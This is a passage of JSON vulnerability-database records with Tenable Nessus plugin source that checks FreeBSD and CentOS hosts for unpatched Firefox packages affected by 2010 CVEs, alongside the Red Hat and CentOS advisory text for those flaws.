9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:44:26", "description": "Mozilla Project reports :\n\nMFSA 2010-08 WOFF heap corruption due to integer overflow", "edition": 23, "published": "2010-03-24T00:00:00", "title": "FreeBSD : firefox -- WOFF heap corruption due to integer overflow (5d5ed535-3653-11df-9edc-000f20797ede)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1028"], "modified": "2010-03-24T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:firefox"], "id": "FREEBSD_PKG_5D5ED535365311DF9EDC000F20797EDE.NASL", "href": "https://www.tenable.com/plugins/nessus/45135", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(45135);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1028\");\n\n script_name(english:\"FreeBSD : firefox -- WOFF heap corruption due to integer overflow (5d5ed535-3653-11df-9edc-000f20797ede)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Project reports :\n\nMFSA 2010-08 WOFF heap corruption due to integer overflow\"\n );\n # http://www.mozilla.org/security/announce/2010/mfsa2010-08.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-08/\"\n );\n # https://vuxml.freebsd.org/freebsd/5d5ed535-3653-11df-9edc-000f20797ede.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10735a0f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox>3.6,1<3.6.2,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:26:23", "description": "An updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 27, "published": "2010-08-09T00:00:00", "title": "CentOS 4 : firefox (CESA-2010:0500)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2010-08-09T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:firefox"], "id": "CENTOS_RHSA-2010-0500.NASL", "href": "https://www.tenable.com/plugins/nessus/48265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0500 and \n# CentOS Errata and Security Advisory 2010:0500 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48265);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0500\");\n\n script_name(english:\"CentOS 4 : firefox (CESA-2010:0500)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016876.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2235db20\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016877.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e48339b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"firefox-3.6.4-8.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"firefox-3.6.4-8.el4.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:26:23", "description": "Updated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 27, "published": "2010-06-25T00:00:00", "title": "CentOS 5 : firefox (CESA-2010:0501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2010-06-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:devhelp-devel", "p-cpe:/a:centos:centos:esc", "p-cpe:/a:centos:centos:totem", "p-cpe:/a:centos:centos:xulrunner-devel", "p-cpe:/a:centos:centos:xulrunner", "p-cpe:/a:centos:centos:gnome-python2-libegg", "p-cpe:/a:centos:centos:firefox", "p-cpe:/a:centos:centos:yelp", "p-cpe:/a:centos:centos:devhelp", "p-cpe:/a:centos:centos:gnome-python2-extras", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:totem-devel", "p-cpe:/a:centos:centos:totem-mozplugin", "p-cpe:/a:centos:centos:gnome-python2-gtkspell", "p-cpe:/a:centos:centos:gnome-python2-gtkhtml2", "p-cpe:/a:centos:centos:gnome-python2-gtkmozembed"], "id": "CENTOS_RHSA-2010-0501.NASL", "href": "https://www.tenable.com/plugins/nessus/47129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0501 and \n# CentOS Errata and Security Advisory 2010:0501 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47129);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0501\");\n\n script_name(english:\"CentOS 5 : firefox (CESA-2010:0501)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-June/016745.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1df5736d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-June/016746.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a5b26d40\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:devhelp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:esc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-python2-gtkhtml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-python2-gtkmozembed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-python2-gtkspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gnome-python2-libegg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:totem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:totem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:totem-mozplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 